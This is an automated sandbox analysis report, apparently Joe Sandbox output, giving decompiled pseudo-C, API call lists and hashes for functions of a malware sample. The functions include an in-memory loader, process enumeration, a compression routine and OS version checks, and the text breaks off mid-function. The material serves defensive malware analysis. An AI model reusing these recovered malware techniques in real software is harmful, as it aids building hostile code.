0x00051f9c
0x00051f72
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,00058A23,?,000DBBA0), ref: 00051F92
memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,00058F82), ref: 00051FA7
memcpy.NTDLL(?,?,?), ref: 00051FE7
LoadLibraryA.KERNEL32(00058F82), ref: 00052093
GetProcAddress.KERNEL32(00000000,-00000002), ref: 000520BF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000520FB

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
String ID:
API String ID: 4175162697-0
Opcode ID: 03b187833679d4c2d0453db6fe63861d28112abea9f761149f1db2e0ac9eae85
Instruction ID: aa90a247c89de7526c2e6d2875781f5118d99b622df894c101acc84b967c0ad7
Opcode Fuzzy Hash: 03b187833679d4c2d0453db6fe63861d28112abea9f761149f1db2e0ac9eae85
Instruction Fuzzy Hash: 3A51AB72A006159FDB20CF58C884B6BB3F5FF5130AB184469EC46E7282E775ED99CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00052110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00052110(intOrPtr* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t14, _t6);
					if(_t6 == 0) {
						L5:
						return CloseHandle(_t14);
					}
					do {
					} while (E00058B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
					goto L5;
				}
				return _t5;
			}

0x0005211f
0x00052121
0x00052127
0x0005212c
0x0005212e
0x00052134
0x00052140
0x00052148
0x00052173
0x00000000
0x00052174
0x00052150
0x0005215d
0x00000000
0x00052150
0x0005217f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00052121
Process32FirstW.KERNEL32(00000000,?), ref: 00052140
CloseHandle.KERNEL32(00000000,?,?), ref: 00052174

Part of subcall function 00058B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,0005215D,0000022C,00000000,?,?), ref: 00058B47
Part of subcall function 00058B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0005215D,0000022C,00000000,?,?), ref: 00058B75
Part of subcall function 00058B30: RtlAllocateHeap.NTDLL(00000000,?,0005215D), ref: 00058B7C
Part of subcall function 00058B30: lstrcpyW.KERNEL32(00000004,?), ref: 00058B8F

Process32NextW.KERNEL32(00000000,0000022C), ref: 00052169

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 3893281644-0
Opcode ID: 248ec4be73098c71b2e933834f57aa6c663c1f642068ec0aef794ef838646689
Instruction ID: c72db2613d1d3bdc366e27d5714060e45b4b4342e6da1f60da61ff0c3cf85e19
Opcode Fuzzy Hash: 248ec4be73098c71b2e933834f57aa6c663c1f642068ec0aef794ef838646689
Instruction Fuzzy Hash: 35F062355017146BF720ABB5AC4CFEF77ACEF4A312F1441A5EE05E2181E7349909CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00056E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00056E70(intOrPtr* __ecx, intOrPtr __edx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t274;
				signed char _t282;
				int _t285;
				intOrPtr _t286;
				intOrPtr _t294;
				signed int _t304;
				signed char _t308;
				signed char _t311;
				signed char _t320;
				signed char _t331;
				signed char _t334;
				signed char _t340;
				signed char _t352;
				signed char _t355;
				signed int _t364;
				void* _t366;
				int _t367;
				signed char _t370;
				intOrPtr _t371;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				char* _t379;
				signed char _t380;
				char* _t381;
				char* _t382;
				signed char _t385;
				signed char _t386;
				signed char _t387;
				char* _t388;
				char* _t389;
				char* _t390;
				char* _t391;
				char* _t396;
				signed char _t397;
				signed char _t398;
				char* _t399;
				char* _t400;
				intOrPtr _t401;
				intOrPtr _t402;
				signed int _t403;
				void* _t404;
				void* _t405;
				signed int _t406;
				void* _t407;
				int _t408;
				intOrPtr _t409;
				int _t412;
				signed int _t413;
				void* _t414;
				intOrPtr* _t415;
				void* _t416;

				_t402 = __edx;
				_t415 = __ecx;
				_v24 = __edx;
				_v12 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0) {
					L2:
					_v8 = 0;
				} else {
					_v8 = 1;
					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
						goto L2;
					}
				}
				if( *_t415 != 0) {
					L6:
					_t274 = _t415 + 0x39272;
				} else {
					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
						goto L6;
					} else {
						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
					}
				}
				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
				_v20 = _t274;
				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
				 *(_t415 + 0x58) = 0;
				 *(_t415 + 0x5c) = 0;
				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
					_t397 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
					_t352 = _t397 + 8;
					 *(_t415 + 0x44) = _t352;
					if(_t352 >= 8) {
						do {
							_t400 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t400 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
					_t398 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
					_t49 = _t398 + 8; // 0x10
					_t355 = _t49;
					 *(_t415 + 0x44) = _t355;
					if(_t355 >= 8) {
						do {
							_t399 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t399 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
				}
				_t370 =  *(_t415 + 0x44);
				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
				_t66 = _t370 + 1; // 0x9
				_t282 = _t66;
				 *(_t415 + 0x44) = _t282;
				if(_t282 >= 8) {
					do {
						_t396 =  *((intOrPtr*)(_t415 + 0x30));
						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
							 *_t396 =  *(_t415 + 0x48);
							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
						}
						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
					} while ( *(_t415 + 0x44) >= 8);
				}
				_t403 =  *(_t415 + 0x48);
				_t409 =  *((intOrPtr*)(_t415 + 0x30));
				_t364 =  *(_t415 + 0x44);
				_v16 = _t403;
				if(_v8 != 0) {
					L31:
					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
						_t285 = _v12;
						goto L58;
					} else {
						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
						 *(_t415 + 0x48) = 0 << _t364 | _t403;
						_t331 = _t364 + 2;
						 *(_t415 + 0x44) = _t331;
						if(_t331 >= 8) {
							do {
								_t391 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t391 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t385 =  *(_t415 + 0x44);
						if(_t385 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
							do {
								_t390 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t390 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t407 = 2;
						do {
							_t386 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
							_t126 = _t386 + 0x10; // 0x18
							_t334 = _t126;
							 *(_t415 + 0x44) = _t334;
							if(_t334 >= 8) {
								do {
									_t389 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t389 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
							_t407 = _t407 - 1;
						} while (_t407 != 0);
						if( *(_t415 + 0x3c) > _t407) {
							do {
								_t387 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
								_t147 = _t387 + 8; // 0x10
								_t340 = _t147;
								 *(_t415 + 0x44) = _t340;
								if(_t340 >= 8) {
									do {
										_t388 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t388 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t407 = _t407 + 1;
							} while (_t407 <  *(_t415 + 0x3c));
						}
					}
				} else {
					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
						E00056A80(_t415);
					} else {
						E00055B10(_t415);
					}
					_t416 = _t416 + 4;
					_t285 = E00056C30(_t415);
					_t408 =  *(_t415 + 0x3c);
					_v12 = _t285;
					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
						L58:
						if(_t285 == 0) {
							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
							 *(_t415 + 0x48) = _v16;
							 *(_t415 + 0x44) = _t364;
							E00056A80(_t415);
							_t416 = _t416 + 4;
							E00056C30(_t415);
						}
					} else {
						_t403 = _v16;
						goto L31;
					}
				}
				_t286 = _v24;
				if(_t286 != 0) {
					_t374 =  *(_t415 + 0x44);
					if(_t286 != 4) {
						_t413 = 0;
						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
						_t308 = _t374 + 3;
						 *(_t415 + 0x44) = _t308;
						if(_t308 >= 8) {
							do {
								_t379 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t379 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t375 =  *(_t415 + 0x44);
						if(_t375 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
							do {
								_t378 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t378 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t405 = 2;
						do {
							_t376 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
							_t230 = _t376 + 0x10; // 0x18
							_t311 = _t230;
							 *(_t415 + 0x44) = _t311;
							if(_t311 >= 8) {
								do {
									_t377 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t377 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							_t413 = _t413 ^ 0x0000ffff;
							_t405 = _t405 - 1;
						} while (_t405 != 0);
					} else {
						if(_t374 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
							do {
								_t382 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t382 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						if(( *(_t415 + 8) & 0x00001000) != 0) {
							_t406 =  *(_t415 + 0x18);
							_t414 = 4;
							do {
								_t380 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
								_t187 = _t380 + 8; // 0x10
								_t320 = _t187;
								 *(_t415 + 0x44) = _t320;
								if(_t320 >= 8) {
									do {
										_t381 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t381 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t406 = _t406 << 8;
								_t414 = _t414 - 1;
							} while (_t414 != 0);
						}
					}
				}
				memset(_t415 + 0x8192, 0, 0x240);
				memset(_t415 + 0x83d2, 0, 0x40);
				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
				 *(_t415 + 0x2c) = _t415 + 0x9272;
				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
				_t294 = _v20;
				 *(_t415 + 0x38) = 8;
				 *(_t415 + 0x3c) = 0;
				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
				if(_t366 == 0) {
					L98:
					return  *(_t415 + 0x5c);
				} else {
					if( *_t415 == 0) {
						_t404 = _t415 + 0x39272;
						if(_t294 != _t404) {
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
							goto L98;
						} else {
							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
							_t367 = _t366 - _t412;
							if(_t367 == 0) {
								goto L98;
							} else {
								 *(_t415 + 0x58) = _t412;
								 *(_t415 + 0x5c) = _t367;
								return _t367;
							}
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
						if(_t304 != 0) {
							goto L98;
						} else {
							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
							return _t304 | 0xffffffff;
						}
					}
				}
			}

0x00056e70
0x00056e78
0x00056e7a
0x00056e7e
0x00056e8c
0x00056ea0
0x00056ea0
0x00056e8e
0x00056e94
0x00056e9e
0x00000000
0x00000000
0x00056e9e
0x00056eaa
0x00056ec7
0x00056ec7
0x00056eac
0x00056eaf
0x00056ebe
0x00000000
0x00056ec0
0x00056ec3
0x00056ec3
0x00056ebe
0x00056ed0
0x00056ed3
0x00056edb
0x00056ee1
0x00056ee8
0x00056eef
0x00056efa
0x00056f04
0x00056f0c
0x00056f16
0x00056f19
0x00056f1c
0x00056f22
0x00056f24
0x00056f24
0x00056f2a
0x00056f2f
0x00056f31
0x00056f31
0x00056f34
0x00056f38
0x00056f3c
0x00056f24
0x00056f42
0x00056f4c
0x00056f4f
0x00056f4f
0x00056f52
0x00056f58
0x00056f60
0x00056f60
0x00056f66
0x00056f6b
0x00056f6d
0x00056f6d
0x00056f70
0x00056f74
0x00056f78
0x00056f60
0x00056f58
0x00056f7e
0x00056f8b
0x00056f8e
0x00056f8e
0x00056f91
0x00056f97
0x00056fa0
0x00056fa0
0x00056fa6
0x00056fab
0x00056fad
0x00056fad
0x00056fb0
0x00056fb4
0x00056fb8
0x00056fa0
0x00056fc2
0x00056fc5
0x00056fc8
0x00056fcb
0x00056fce
0x00057016
0x0005701f
0x0005712b
0x00000000
0x00057025
0x00057027
0x00057030
0x00057033
0x00057036
0x0005703c
0x00057040
0x00057040
0x00057046
0x0005704b
0x0005704d
0x0005704d
0x00057050
0x00057054
0x00057058
0x00057040
0x0005705e
0x00057063
0x00057067
0x00057070
0x00057073
0x00057073
0x00057079
0x0005707e
0x00057080
0x00057080
0x00057083
0x00057087
0x0005708b
0x00057073
0x00057091
0x00057096
0x00057096
0x0005709f
0x000570a2
0x000570a2
0x000570a5
0x000570ab
0x000570b0
0x000570b0
0x000570b6
0x000570bb
0x000570bd
0x000570bd
0x000570c0
0x000570c4
0x000570c8
0x000570b0
0x000570ce
0x000570d5
0x000570d5
0x000570db
0x000570e0
0x000570e3
0x000570f7
0x000570fa
0x000570fa
0x000570fd
0x00057103
0x00057105
0x00057105
0x0005710b
0x00057110
0x00057112
0x00057112
0x00057115
0x00057119
0x0005711d
0x00057105
0x00057123
0x00057124
0x00057129
0x000570db
0x00056fd0
0x00056fd7
0x00056fe8
0x00056fdf
0x00056fe0
0x00056fe0
0x00056fed
0x00056ff2
0x00056ff7
0x00056ffa
0x00056fff
0x0005712e
0x00057130
0x00057136
0x00057139
0x0005713c
0x0005713f
0x00057144
0x00057149
0x00057149
0x00057013
0x00057013
0x00000000
0x00057013
0x00056fff
0x0005714e
0x00057153
0x00057159
0x0005715f
0x000571f3
0x000571f7
0x000571fa
0x000571fd
0x00057203
0x00057205
0x00057205
0x0005720b
0x00057210
0x00057212
0x00057212
0x00057215
0x00057219
0x0005721d
0x00057205
0x00057223
0x00057228
0x0005722c
0x00057235
0x00057238
0x00057238
0x0005723e
0x00057243
0x00057245
0x00057245
0x00057248
0x0005724c
0x00057250
0x00057238
0x00057256
0x00057260
0x00057260
0x00057268
0x0005726b
0x0005726b
0x0005726e
0x00057274
0x00057276
0x00057276
0x0005727c
0x00057281
0x00057283
0x00057283
0x00057286
0x0005728a
0x0005728e
0x00057276
0x00057294
0x0005729a
0x0005729a
0x00057165
0x00057167
0x0005716b
0x00057174
0x00057177
0x00057177
0x0005717d
0x00057182
0x00057184
0x00057184
0x00057187
0x0005718b
0x0005718f
0x00057177
0x0005719c
0x000571a2
0x000571a5
0x000571b0
0x000571b0
0x000571ba
0x000571bd
0x000571bd
0x000571c0
0x000571c6
0x000571c8
0x000571c8
0x000571ce
0x000571d3
0x000571d5
0x000571d5
0x000571d8
0x000571dc
0x000571e0
0x000571c8
0x000571e6
0x000571e9
0x000571e9
0x000571ec
0x0005719c
0x0005715f
0x000572ab
0x000572bc
0x000572cb
0x000572d1
0x000572da
0x000572e0
0x000572e3
0x000572e6
0x000572ed
0x000572f4
0x000572f6
0x00057382
0x0005738b
0x000572fc
0x000572ff
0x00057336
0x0005733e
0x0005737c
0x00000000
0x00057340
0x00057343
0x00057352
0x0005735a
0x00057360
0x00057369
0x0005736b
0x00000000
0x0005736d
0x0005736d
0x00057373
0x0005737b
0x0005737b
0x0005736b
0x00057301
0x0005730d
0x0005731c
0x00057323
0x00000000
0x00057326
0x00057326
0x00057335
0x00057335
0x00057323
0x000572ff

APIs

memset.NTDLL ref: 000572AB
memset.NTDLL ref: 000572BC

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ce4fe522a02cb3c7b4e282d076f61b354482c39e0b61956ecb9b848ecbbe40bf
Instruction ID: 531de43bcd186cddd352353b64cf0ba80774283e278516ea144a0abf7daec243
Opcode Fuzzy Hash: ce4fe522a02cb3c7b4e282d076f61b354482c39e0b61956ecb9b848ecbbe40bf
Instruction Fuzzy Hash: 16024230505B108FCB75CF29C688667B7F1BF44726B600A2EC9AB87E91D632F849DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00058D50, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(?), ref: 00058D6D
GetNativeSystemInfo.KERNEL32(?), ref: 00058D77

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 6d05065ffe4891583b507a1e0c5cf981dd93152c340c79f887d4a90f98fdba4c
Instruction ID: 8651f40635df1d00cc619bf8a522c712fd01faf81048fddbba2933b4d10d60b0
Opcode Fuzzy Hash: 6d05065ffe4891583b507a1e0c5cf981dd93152c340c79f887d4a90f98fdba4c
Instruction Fuzzy Hash: BFF03132D106184FF751CF6ACC056C9B7F9E789304F0481A0E42DF6609D6B4EA15DB54

Uniqueness

Uniqueness Score: -1.00%

Function 000577F0, Relevance: .6, Instructions: 581
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E000577F0(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t390;
				void* _t402;
				signed int _t410;
				unsigned int* _t411;
				unsigned int* _t420;
				signed int _t432;
				unsigned int* _t434;
				unsigned int* _t451;
				unsigned int* _t453;
				void* _t463;
				void* _t480;
				signed int _t483;
				signed int _t494;
				signed char _t504;
				signed int _t508;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr* _t516;
				intOrPtr* _t517;
				intOrPtr _t520;
				intOrPtr _t522;
				intOrPtr _t523;
				signed int _t524;
				signed int _t528;
				signed char* _t531;
				void* _t534;
				signed char _t538;
				signed char _t543;
				void* _t548;
				void* _t550;
				intOrPtr* _t551;
				intOrPtr _t555;
				intOrPtr _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				signed int _t564;
				intOrPtr* _t567;
				intOrPtr* _t571;
				intOrPtr _t572;
				signed int _t573;
				signed int _t575;
				signed int _t576;
				signed int _t579;
				signed int _t582;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				void* _t594;
				signed int _t595;
				signed int _t600;
				intOrPtr _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				intOrPtr* _t612;

				_t612 = __ecx;
				_v76 = __ecx;
				_t571 =  *((intOrPtr*)(__ecx + 0x84));
				_t601 =  *((intOrPtr*)(__ecx + 0x88));
				_t375 =  *((intOrPtr*)(__ecx + 0x80));
				_v12 = _t571;
				_v20 = _t601;
				_v48 = _t375;
				L2:
				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
					_t520 =  *((intOrPtr*)(_t612 + 0x20));
					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
						if(_t601 != 0) {
							while(1) {
								_t557 =  *((intOrPtr*)(_t612 + 0x20));
								if(_t557 >= 0x102) {
									goto L11;
								}
								_t601 = _t601 - 1;
								_t510 =  *_t571;
								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
								_v20 = _t601;
								_t571 = _t571 + 1;
								_v12 = _t571;
								 *(_t483 + _t612 + 0x90) = _t510;
								if(_t483 < 0x101) {
									 *(_t483 + _t612 + 0x8090) = _t510;
								}
								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
								_t558 =  *((intOrPtr*)(_t612 + 0x20));
								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
									_t579 = _t608 & 0x00007fff;
									_t89 = _t608 + 1; // 0x11
